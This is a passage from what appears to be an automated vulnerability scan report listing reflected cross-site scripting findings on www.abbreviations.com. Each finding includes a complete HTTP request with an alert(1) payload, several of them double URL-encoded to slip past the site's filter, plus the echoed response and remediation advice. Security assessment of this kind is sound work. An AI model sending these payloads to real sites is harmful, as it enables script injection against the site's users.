GET /b1.aspx7370d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea8f2cde6c5 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=1grciv55jtc043nj02tmceql; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:10 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does b1.aspx7370d"><script>alert(1)</script>a8f2cde6c5 stand for?, What does b1.aspx7370d">
...[SNIP]...

4.423. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload bbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 was submitted in the REST URL parameter 1. This input was echoed as bbc7d</title><script>alert(1)</script>f3af19687e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspxbbc7d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef3af19687e3 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=oh2g2tf0l1wefs55qtaryc45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:54 GMT
Connection: close
Content-Length: 27265


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does b1.aspxbbc7d</title><script>alert(1)</script>f3af19687e3 stand for?</title>
...[SNIP]...

4.424. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 was submitted in the REST URL parameter 1. This input was echoed as 51536<script>alert(1)</script>7a00ceef170 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspx51536%253cscript%253ealert%25281%2529%253c%252fscript%253e7a00ceef170 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iab1cy45uqfjxpv3302ggknn; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:05:11 GMT
Connection: close
Content-Length: 27034


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>7a00ceef170";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>alert(1)</script>7a00ceef170" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "b1.aspx51536<script>
...[SNIP]...

4.425. http://www.abbreviations.com/b1.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /b1.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 was submitted in the REST URL parameter 1. This input was echoed as 9bb6c";alert(1)//d18bcda9b02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /b1.aspx9bb6c%2522%253balert%25281%2529%252f%252fd18bcda9b02 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=t3ixkyvszgc35h2wjylwru45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 16:04:33 GMT
Connection: close
Content-Length: 26718


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "b1.aspx9bb6c";alert(1)//d18bcda9b02" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.426. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 was submitted in the REST URL parameter 1. This input was echoed as 85bcf";alert(1)//43b53048b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx85bcf%2522%253balert%25281%2529%252f%252f43b53048b7 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:26:25 GMT
Connection: close
Content-Length: 26690


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspx85bcf";alert(1)//43b53048b7" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href =
...[SNIP]...

4.427. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 was submitted in the REST URL parameter 1. This input was echoed as d1eeb<script>alert(1)</script>78129bb9875 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspxd1eeb%253cscript%253ealert%25281%2529%253c%252fscript%253e78129bb9875 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:28:00 GMT
Connection: close
Content-Length: 27049


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>78129bb9875";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>alert(1)</script>78129bb9875" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs.aspxd1eeb<script>
...[SNIP]...

4.428. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e was submitted in the REST URL parameter 1. This input was echoed as 2ea5b"><script>alert(1)</script>305b24ff28e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx2ea5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e305b24ff28e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:25:24 GMT
Connection: close
Content-Length: 27088


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs.aspx2ea5b"><script>alert(1)</script>305b24ff28e stand for?, What does bs.aspx2ea5b">
...[SNIP]...

4.429. http://www.abbreviations.com/bs.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 was submitted in the REST URL parameter 1. This input was echoed as 8840d</title><script>alert(1)</script>9fb241ced95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs.aspx8840d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9fb241ced95 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:29:21 GMT
Connection: close
Content-Length: 27249


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does bs.aspx8840d</title><script>alert(1)</script>9fb241ced95 stand for?</title>
...[SNIP]...

4.430. http://www.abbreviations.com/bs.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as text between TITLE tags. The payload 5fc81</title><script>alert(1)</script>fedac000817 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=5fc81</title><script>alert(1)</script>fedac000817 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:48 GMT
Connection: close
Content-Length: 27095


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<title>What does 5fc81</title><script>alert(1)</script>fedac000817 stand for?</title>
...[SNIP]...

4.431. http://www.abbreviations.com/bs.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 60dff<script>alert(1)</script>065acfc4527 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=60dff<script>alert(1)</script>065acfc4527 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:18:09 GMT
Connection: close
Content-Length: 26879


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>065acfc4527";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "60dff<script>alert(1)</script>065acfc4527" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "60dff<script>
...[SNIP]...

4.432. http://www.abbreviations.com/bs.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb709"%3balert(1)//e93c20de0d6 was submitted in the st parameter. This input was echoed as eb709";alert(1)//e93c20de0d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bs.aspx?st=eb709"%3balert(1)//e93c20de0d6 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:38 GMT
Connection: close
Content-Length: 26509


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<script language="javascript">
function metasearch()
{
URL = "bs2.aspx?st=" + "eb709";alert(1)//e93c20de0d6";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "eb709";alert(1)//e93c20de0d6" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;

...[SNIP]...

4.433. http://www.abbreviations.com/bs.aspx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs.aspx

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40cdf"><script>alert(1)</script>4bbb37d871e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bs.aspx?st=40cdf"><script>alert(1)</script>4bbb37d871e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:17:13 GMT
Connection: close
Content-Length: 26899


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does 40cdf"><script>alert(1)</script>4bbb37d871e stand for?, What does 40cdf">
...[SNIP]...

4.434. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e was submitted in the REST URL parameter 1. This input was echoed as a2de4"><script>alert(1)</script>f2de11f4e6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxa2de4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2de11f4e6e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:27:43 GMT
Connection: close
Content-Length: 27149


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
<meta name="keywords" content="What does bs2.aspxa2de4"><script>alert(1)</script>f2de11f4e6e stand for?, What does bs2.aspxa2de4">
...[SNIP]...

4.435. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e was submitted in the REST URL parameter 1. This input was echoed as d35d7<script>alert(1)</script>f5e8b18658e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspxd35d7%253cscript%253ealert%25281%2529%253c%252fscript%253ef5e8b18658e HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=5591651.1295903333.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/32|utmcmd=referral; __utma=5591651.1564661048.1295903333.1295903333.1295903333.1; __utmc=5591651; __utmb=5591651; ASP.NET_SessionId=xydeiaqh04djp455gggyiyie;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 24 Jan 2011 23:31:36 GMT
Connection: close
Content-Length: 27076


<html>
<head>
<style>
.csb,.ss,#logo span,.play_icon,#tbp,.lsb,.mbi{background:#000055; no-repeat;overflow:hidden}
.csb,.ss{background-position:0 0;height:38px;display:block}

.lst{background-
...[SNIP]...
</script>f5e8b18658e";
window.location.href = URL;
}
function GoToPage(num)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>alert(1)</script>f5e8b18658e" + "&SE=" + "3" + "&o=" + "p" + "&p=" + num
window.location.href = URL;
}
function Filter(cat)
{
URL = "bs.aspx?st=" + "bs2.aspxd35d7<script>
...[SNIP]...

4.436. http://www.abbreviations.com/bs2.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.abbreviations.com
Path:   /bs2.aspx

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 was submitted in the REST URL parameter 1. This input was echoed as 20e54</title><script>alert(1)</script>5cef4e545b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bs2.aspx20e54%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5cef4e545b4 HTTP/1.1
Host: www.abbreviations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
